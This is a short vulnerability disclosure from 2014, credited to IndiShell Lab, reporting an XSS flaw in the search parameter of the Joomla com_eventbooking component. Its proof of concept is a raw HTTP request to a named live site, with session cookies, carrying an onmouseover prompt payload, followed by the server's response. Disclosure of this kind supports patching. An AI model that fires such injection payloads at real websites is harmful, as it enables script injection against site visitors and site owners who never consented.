################################################################################################## #Exploit Title : Joomla com_eventbooking component XSS vulnerability #Author : Jagriti Sahu AKA incredible #Download Link : https://github.com/Jasonudoo/platform/tree/master/components/com_eventbooking #Date : 13/11/2014 #Discovered at : IndiShell Lab #Love to : Surbhi, Mrudula and Harry #Discovered At : Indishell Lab ################################################################################################## //////////////////////// /// Overview: //////////////////////// joomla component com_eventbooking is not filtering data in search parameter and hence affected from XSS vulnerability /////////////////////////////// // Vulnerability Description: /////////////////////////////// vulnerability is due to search parameter in search box, and pron to xss vulnerability //////////////// /// POC //// /////////////// POC image=http://oi61.tinypic.com/aol6qc.jpg http://eastvicevents.com.au/index.php?option=com_eventbooking&Itemid=101 POST /index.php?option=com_eventbooking&Itemid=101 HTTP/1.1 Host: eastvicevents.com.au User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://eastvicevents.com.au/index.php?option=com_eventbooking&Itemid=101 Cookie: 230d19898da30be54648f536cbac3652=ca2096bf2055cf7c31462f8f056f84d4; __utma=222259084.1320908457.1415891642.1415891642.1415891642.1; __utmb=222259084.18.10.1415891642; __utmc=222259084; __utmz=222259084.1415891642.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1 Content-Type: application/x-www-form-urlencoded Content-Length: 177 search=test" onmouseover=prompt(String.fromCharCode(120,115,115,32,116,101,115,116,105,110,103));//&category_id=13&location_id=474&option=com_eventbooking&Itemid=101&view=search HTTP/1.1 200 OK Content-Encoding: gzip Vary: Accept-Encoding Date: Thu, 13 Nov 2014 16:10:17 GMT Server: LiteSpeed X-Powered-By: PHP/5.5.18 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Pragma: no-cache Connection: close